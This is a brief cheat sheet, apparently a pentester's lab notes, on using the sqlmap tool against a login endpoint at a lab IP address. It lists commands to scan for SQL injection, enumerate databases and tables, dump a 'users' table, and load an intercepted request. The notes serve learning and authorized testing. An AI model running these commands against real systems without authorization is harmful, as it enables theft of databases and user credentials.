sqlmap

Sqlmap is an enumeration tool used to identify sql injection vulnerabilities on web application.

Basic sqlmap Commands

1. Basic SQL Injection Scan Scan a URL for SQL injection vulnerabilities with a defined level of testing:

   sqlmap -u <URL_REQUEST> --level=5

   Example:

   sqlmap -u 'http://10.10.99.139/ai/includes/user_login?email=test&password=hello' --level=5

2. List Databases List all databases available on the target:

   sqlmap -u <URL_REQUEST> --level=5 --dbs

3. List Tables of a Specific Database List all tables in a specified database:

   sqlmap -u <URL_REQUEST> --level=5 -D <DATABASE> --tables

   Example:

   sqlmap -u 'http://10.10.99.139/ai/includes/user_login?email=test&password=hello' --level=5 -D 'my_database' --tables

4. Dump Data from a Specific Table Dump the contents of a table in a specified database:

   sqlmap -u <URL_REQUEST> --level=5 -D <DATABASE> -T <TABLE> --dump

   Example:

   sqlmap -u 'http://10.10.99.139/ai/includes/user_login?email=test&password=hello' --level=5 -D 'my_database' -T 'users' --dump

Advanced Usage

1. Use Intercepted HTTP Request If you have an intercepted request saved to a file (e.g., intercepted_request.txt), you can use it as input for sqlmap:

   sqlmap -r intercepted_request.txt

• --level=5 specifies the testing level, where 5 means the most thorough scan.